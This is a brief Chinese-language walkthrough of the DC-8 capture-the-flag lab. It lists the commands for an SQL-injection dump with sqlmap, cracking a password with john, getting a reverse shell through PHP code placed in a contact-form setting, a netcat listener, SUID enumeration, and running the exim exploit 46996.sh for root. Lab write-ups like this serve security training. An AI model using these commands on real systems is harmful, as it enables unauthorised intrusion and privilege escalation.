1.信息搜集
端口 22,80,31337
存活ip 192.168.85.136
2.访问网站，进行信息搜集
在欢迎页面发现sql注入

sqlmap进行跑数据

python sqlmap.py -u "http://192.168.85.136/?nid=1" --batch -D d7db -T users -C name,pass --dump

尝试robots.txt,发现后他登录页面/user/login

3.使用john进行破解密码
密文写入1.txt，只爆出john密码 turtle

john 1.txt

4.登录后台反弹shell

这个地方上传图片，有大小限制，且没找到文件包含
在Contact Us —Webfrom—Form settings可以写php代码，文件类型改为php代码，保存即可

在Contact Us处写入内容，邮箱点击提交

5.进行信息搜集
kali成功监听

nc -lvvp 4455
python -c 'import pty;pty.spawn("/bin/bash")'

家目录，tmp目录没发现有用的信息

6.尝试进行suid提权

find / -perm -u=s -type f 2>/dev/null

查看安装版本

dpkg -l | grep exim

kali查找exim4 exp

searchsploit exim  

上传46996.sh
执行

./46996.sh -m netcat

提权成功

dc-8
linux第三方提权